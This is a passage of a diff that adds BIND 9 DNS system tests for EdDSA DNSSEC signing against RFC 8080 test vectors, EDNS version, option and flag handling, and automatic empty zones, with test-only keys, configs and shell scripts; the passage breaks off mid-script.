a/bin/tests/system/eddsa/ns2/sign.sh b/bin/tests/system/eddsa/ns2/sign.sh new file mode 100644 index 0000000..09bfb93 --- /dev/null +++ b/bin/tests/system/eddsa/ns2/sign.sh @@ -0,0 +1,37 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=example.com. +infile=example.com.db.in +zonefile=example.com.db +starttime=20150729220000 +endtime=20150819220000 + +echo_i "ns2/sign.sh" + +cp $infile $zonefile + +if [ -f ../ed25519-supported.file ]; then + + for i in Xexample.com.+015+03613 Xexample.com.+015+35217 + do + cp "$i.key" "$(echo $i.key | sed s/X/K/)" + cp "$i.private" "$(echo $i.private | sed s/X/K/)" + cat "$(echo $i.key | sed s/X/K/)" >> "$zonefile" + done +fi + +$SIGNER -P -z -s $starttime -e $endtime -o $zone $zonefile > /dev/null 2> signer.err || cat signer.err diff --git a/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.key b/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.key new file mode 100644 index 0000000..5c4628f --- /dev/null +++ b/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.key @@ -0,0 +1 @@ +example.com. IN DNSKEY 257 3 16 3kgROaDjrh0H2iuixWBrc8g2EpBBLCdGzHmn+G2MpTPhpj/OiBVHHSfPodx1FYYUcJKm1MDpJtIA diff --git a/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.private b/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.private new file mode 100644 index 0000000..eb065f9 --- /dev/null +++ b/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.private @@ -0,0 +1,3 @@ +Private-key-format: v1.2 +Algorithm: 16 (ED448) +PrivateKey: xZ+5Cgm463xugtkY5B0Jx6erFTXp13rYegst0qRtNsOYnaVpMx0Z/c5EiA9x8wWbDDct/U3FhYWA diff --git a/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.key b/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.key new file mode 100644 index 0000000..705856d --- /dev/null +++ b/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.key @@ -0,0 +1 @@ +example.com. IN DNSKEY 257 3 16 kkreGWoccSDmUBGAe7+zsbG6ZAFQp+syPmYUurBRQc3tDjeMCJcVMRDmgcNLp5HlHAMy12VoISsA diff --git a/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.private b/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.private new file mode 100644 index 0000000..b512d80 --- /dev/null +++ b/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.private @@ -0,0 +1,3 @@ +Private-key-format: v1.2 +Algorithm: 16 (ED448) +PrivateKey: WEykD3ht3MHkU8iH4uVOLz8JLwtRBSqiBoM6fF72+Mrp/u5gjxuB1DV6NnPO2BlZdz4hdSTkOdOA diff --git a/bin/tests/system/eddsa/ns3/example.com.db.in b/bin/tests/system/eddsa/ns3/example.com.db.in new file mode 100644 index 0000000..9a1aab6 --- /dev/null +++ b/bin/tests/system/eddsa/ns3/example.com.db.in @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA fdupont.isc.org. ns.example.com. ( + 2012040600 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 3600 ; minimum + ) + MX 10 mail.example.com. + NS ns.example.com. +ns.example.com. A 10.53.0.3 diff --git a/bin/tests/system/eddsa/ns3/named.conf.in b/bin/tests/system/eddsa/ns3/named.conf.in new file mode 100644 index 0000000..f1a80b6 --- /dev/null +++ b/bin/tests/system/eddsa/ns3/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/eddsa/ns3/sign.sh b/bin/tests/system/eddsa/ns3/sign.sh new file mode 100644 index 0000000..3cb8b45 --- /dev/null +++ b/bin/tests/system/eddsa/ns3/sign.sh @@ -0,0 +1,36 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=example.com. +infile=example.com.db.in +zonefile=example.com.db +starttime=20150729220000 +endtime=20150819220000 + +echo_i "ns3/sign.sh" + +cp $infile $zonefile + +if [ -f ../ed448-supported.file ]; then + for i in Xexample.com.+016+09713 Xexample.com.+016+38353 + do + cp "$i.key" "$(echo $i.key | sed s/X/K/)" + cp "$i.private" "$(echo $i.private | sed s/X/K/)" + cat "$(echo $i.key | sed s/X/K/)" >> "$zonefile" + done +fi + +$SIGNER -P -z -s "$starttime" -e "$endtime" -o "$zone" "$zonefile" > /dev/null 2> signer.err || cat signer.err diff --git a/bin/tests/system/eddsa/prereq.sh b/bin/tests/system/eddsa/prereq.sh new file mode 100644 index 0000000..a1a16ae --- /dev/null +++ b/bin/tests/system/eddsa/prereq.sh @@ -0,0 +1,25 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +supported=0 +if $SHELL ../testcrypto.sh ed25519; then + supported=1 +fi +if $SHELL ../testcrypto.sh ed448; then + supported=1 +fi + +[ "$supported" -eq 1 ] || exit 1 diff --git a/bin/tests/system/eddsa/setup.sh b/bin/tests/system/eddsa/setup.sh new file mode 100644 index 0000000..4bac09a --- /dev/null +++ b/bin/tests/system/eddsa/setup.sh @@ -0,0 +1,40 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $SHELL ../testcrypto.sh ed25519; then + echo "yes" > ed25519-supported.file +fi + +if $SHELL ../testcrypto.sh ed448; then + echo "yes" > ed448-supported.file +fi + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf + +( + cd ns1 + $SHELL sign.sh +) +( + cd ns2 + $SHELL sign.sh +) +( + cd ns3 + $SHELL sign.sh +) diff --git a/bin/tests/system/eddsa/tests.sh b/bin/tests/system/eddsa/tests.sh new file mode 100644 index 0000000..705f5de --- /dev/null +++ b/bin/tests/system/eddsa/tests.sh @@ -0,0 +1,84 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +dig_with_opts() { + "$DIG" +tcp +noau +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" +} + +if [ -f ed25519-supported.file ]; then + # Check the example. domain + n=$((n+1)) + echo_i "checking that Ed25519 positive validation works ($n)" + ret=0 + dig_with_opts . @10.53.0.1 soa > dig.out.ns1.test$n || ret=1 + dig_with_opts . @10.53.0.2 soa > dig.out.ns2.test$n || ret=1 + $PERL ../digcomp.pl dig.out.ns1.test$n dig.out.ns2.test$n || ret=1 + grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + # Check test vectors (RFC 8080 + errata) + n=$((n+1)) + echo_i "checking that Ed25519 test vectors match ($n)" + ret=0 + grep 'oL9krJun7xfBOIWcGHi7mag5/hdZrKWw15jP' ns2/example.com.db.signed > /dev/null || ret=1 + grep 'VrbpMngwcrqNAg==' ns2/example.com.db.signed > /dev/null || ret=1 + grep 'zXQ0bkYgQTEFyfLyi9QoiY6D8ZdYo4wyUhVi' ns2/example.com.db.signed > /dev/null || ret=1 + grep 'R0O7KuI5k2pcBg==' ns2/example.com.db.signed > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "algorithm Ed25519 not supported, skipping vectors match test" +fi + +if [ -f ed448-supported.file ]; then + # Check the example. domain + n=$((n+1)) + echo_i "checking that Ed448 positive validation works ($n)" + ret=0 + dig_with_opts . @10.53.0.1 soa > dig.out.ns1.test$n || ret=1 + dig_with_opts . @10.53.0.3 soa > dig.out.ns3.test$n || ret=1 + $PERL ../digcomp.pl dig.out.ns1.test$n dig.out.ns3.test$n || ret=1 + grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + # Check test vectors (RFC 8080 + errata) + n=$((n+1)) + echo_i "checking that Ed448 test vectors match ($n)" + ret=0 + grep '3cPAHkmlnxcDHMyg7vFC34l0blBhuG1qpwLm' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'jInI8w1CMB29FkEAIJUA0amxWndkmnBZ6SKi' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'wZSAxGILn/NBtOXft0+Gj7FSvOKxE/07+4RQ' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'vE581N3Aj/JtIyaiYVdnYtyMWbSNyGEY2213' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'WKsJlwEA' ns3/example.com.db.signed > /dev/null || ret=1 + + grep 'E1/oLjSGIbmLny/4fcgM1z4oL6aqo+izT3ur' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'CyHyvEp4Sp8Syg1eI+lJ57CSnZqjJP41O/9l' ns3/example.com.db.signed > /dev/null || ret=1 + grep '4m0AsQ4f7qI1gVnML8vWWiyW2KXhT9kuAICU' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'Sxv5OWbf81Rq7Yu60npabODB0QFPb/rkW3kU' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'ZmQ0YQUA' ns3/example.com.db.signed > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "algorithm Ed448 not supported, skipping vectors match test" +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/ednscompliance/clean.sh b/bin/tests/system/ednscompliance/clean.sh new file mode 100644 index 0000000..ad6176a --- /dev/null +++ b/bin/tests/system/ednscompliance/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out* +rm -f ns*/named.lock +rm -f ns*/named.conf +rm -f ns*/named.run +rm -f ns*/named.memstats +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/ednscompliance/ns1/named.conf.in b/bin/tests/system/ednscompliance/ns1/named.conf.in new file mode 100644 index 0000000..07aaf21 --- /dev/null +++ b/bin/tests/system/ednscompliance/ns1/named.conf.in @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/ednscompliance/ns1/root.db b/bin/tests/system/ednscompliance/ns1/root.db new file mode 100644 index 0000000..f9bfbe9 --- /dev/null +++ b/bin/tests/system/ednscompliance/ns1/root.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA marka.isc.org. a.root.servers.nil. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.6 diff --git a/bin/tests/system/ednscompliance/setup.sh b/bin/tests/system/ednscompliance/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/ednscompliance/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/ednscompliance/tests.sh b/bin/tests/system/ednscompliance/tests.sh new file mode 100644 index 0000000..27e46df --- /dev/null +++ b/bin/tests/system/ednscompliance/tests.sh @@ -0,0 +1,113 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+norec -p ${PORT}" + +status=0 +n=0 +zone=. + +n=`expr $n + 1` +echo_i "check +edns=100 sets version 100 ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +qr +edns=100 soa $zone > dig.out$n +grep "EDNS: version: 100," dig.out$n > /dev/null || { ret=1; reason="version"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +ret=0 reason= +echo_i "check +ednsopt=100 adds option 100 ($n)" +$DIG $DIGOPTS @10.53.0.1 +qr +ednsopt=100 soa $zone > dig.out$n +grep "; OPT=100" dig.out$n > /dev/null || { ret=1; reason="option"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check +ednsflags=0x80 sets flags to 0x0080 ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +qr +ednsflags=0x80 soa $zone > dig.out$n +grep "MBZ: 0x0080," dig.out$n > /dev/null || { ret=1; reason="flags"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Unknown EDNS version ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +edns=100 +noednsnegotiation soa $zone > dig.out$n +grep "status: BADVERS," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "IN.SOA." dig.out$n > /dev/null && { ret=1; reason="soa"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Unknown EDNS option ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +ednsopt=100 soa $zone > dig.out$n +grep "status: NOERROR," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "; OPT=100" dig.out$n > /dev/null && { ret=1; reason="option"; } +grep "IN.SOA." dig.out$n > /dev/null || { ret=1; reason="nosoa"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Unknown EDNS version + option ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +edns=100 +noednsneg +ednsopt=100 soa $zone > dig.out$n +grep "status: BADVERS," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "; OPT=100" dig.out$n > /dev/null && { ret=1; reason="option"; } +grep "IN.SOA." dig.out$n > /dev/null && { ret=1; reason="soa"; } +if [ $ret != 0 ]; then echo_i "failed: $reason"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "Unknown EDNS flag ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +ednsflags=0x80 soa $zone > dig.out$n +grep "status: NOERROR," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "EDNS:.*MBZ" dig.out$n > /dev/null > /dev/null && { ret=1; reason="mbz"; } +grep ".IN.SOA." dig.out$n > /dev/null || { ret=1; reason="nosoa"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Unknown EDNS version + flag ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +edns=100 +noednsneg +ednsflags=0x80 soa $zone > dig.out$n +grep "status: BADVERS," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "EDNS:.*MBZ" dig.out$n > /dev/null > /dev/null && { ret=1; reason="mbz"; } +grep "IN.SOA." dig.out$n > /dev/null && { ret=1; reason="soa"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "DiG's EDNS negotiation ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +edns=100 soa $zone > dig.out$n +grep "status: NOERROR," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "IN.SOA." dig.out$n > /dev/null || { ret=1; reason="soa"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/emptyzones/clean.sh b/bin/tests/system/emptyzones/clean.sh new file mode 100644 index 0000000..c7ff161 --- /dev/null +++ b/bin/tests/system/emptyzones/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns1/named.conf +rm -f ns*/named.lock +rm -f ns*/named.run +rm -f ns*/named.memstats +rm -f dig.out.test* +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/emptyzones/ns1/empty.db b/bin/tests/system/emptyzones/ns1/empty.db new file mode 100644 index 0000000..70dbcaf --- /dev/null +++ b/bin/tests/system/emptyzones/ns1/empty.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA . . 0 0 0 0 0 +@ 0 NS . diff --git a/bin/tests/system/emptyzones/ns1/named1.conf.in b/bin/tests/system/emptyzones/ns1/named1.conf.in new file mode 100644 index 0000000..2cf1286 --- /dev/null +++ b/bin/tests/system/emptyzones/ns1/named1.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + algorithm hmac-sha256; + secret "1234abcd8765"; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1 dscp 1; + notify-source 10.53.0.1 dscp 2; + transfer-source 10.53.0.1 dscp 3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + deny-answer-addresses { 192.0.2.0/24; 2001:db8:beef::/48; } + except-from { "example.org"; }; + deny-answer-aliases { "example.org"; } + except-from { "goodcname.example.net"; + "gooddname.example.net"; }; + allow-query {!10.53.0.8; any; }; +}; + +zone "." { + type hint; + file "root.hint"; +}; + +include "rfc1918.zones"; diff --git a/bin/tests/system/emptyzones/ns1/named2.conf.in b/bin/tests/system/emptyzones/ns1/named2.conf.in new file mode 100644 index 0000000..f62cfc9 --- /dev/null +++ b/bin/tests/system/emptyzones/ns1/named2.conf.in @@ -0,0 +1,48 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + algorithm hmac-sha256; + secret "1234abcd8765"; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1 dscp 1; + notify-source 10.53.0.1 dscp 2; + transfer-source 10.53.0.1 dscp 3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + deny-answer-addresses { 192.0.2.0/24; 2001:db8:beef::/48; } + except-from { "example.org"; }; + deny-answer-aliases { "example.org"; } + except-from { "goodcname.example.net"; + "gooddname.example.net"; }; + allow-query {!10.53.0.8; any; }; + allow-transfer { none; }; +}; + +zone "." { + type hint; + file "root.hint"; +}; + +zone "1.10.in-addr.arpa" { + type primary; file "empty.db"; +}; diff --git a/bin/tests/system/emptyzones/ns1/rfc1918.zones b/bin/tests/system/emptyzones/ns1/rfc1918.zones new file mode 100644 index 0000000..07858f9 --- /dev/null +++ b/bin/tests/system/emptyzones/ns1/rfc1918.zones @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "10.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "16.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "17.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "18.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "19.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "20.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "21.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "22.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "23.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "24.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "25.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "26.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "27.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "28.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "29.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "30.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "31.172.IN-ADDR.ARPA" { type primary; file "empty.db"; }; +zone "168.192.IN-ADDR.ARPA" { type primary; file "empty.db"; }; + diff --git a/bin/tests/system/emptyzones/ns1/root.hint b/bin/tests/system/emptyzones/ns1/root.hint new file mode 100644 index 0000000..993227d --- /dev/null +++ b/bin/tests/system/emptyzones/ns1/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.2 diff --git a/bin/tests/system/emptyzones/setup.sh b/bin/tests/system/emptyzones/setup.sh new file mode 100644 index 0000000..df9d8f3 --- /dev/null +++ b/bin/tests/system/emptyzones/setup.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh +copy_setports ns1/named1.conf.in ns1/named.conf diff --git a/bin/tests/system/emptyzones/tests.sh b/bin/tests/system/emptyzones/tests.sh new file mode 100644 index 0000000..e2ee0fd --- /dev/null +++ b/bin/tests/system/emptyzones/tests.sh @@ -0,0 +1,45 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "check that switching to automatic empty zones works ($n)" +ret=0 +rndc_reload ns1 10.53.0.1 + +copy_setports ns1/named2.conf.in ns1/named.conf +$RNDCCMD 10.53.0.1 reload > /dev/null || ret=1 +sleep 5 + +$DIG $DIGOPTS +vc version.bind txt ch @10.53.0.1 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that allow-transfer { none; } works ($n)" +ret=0 +$DIG $DIGOPTS axfr 10.in-addr.arpa @10.53.0.1 +all > dig.out.test$n || ret=1 +grep "status: REFUSED" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then 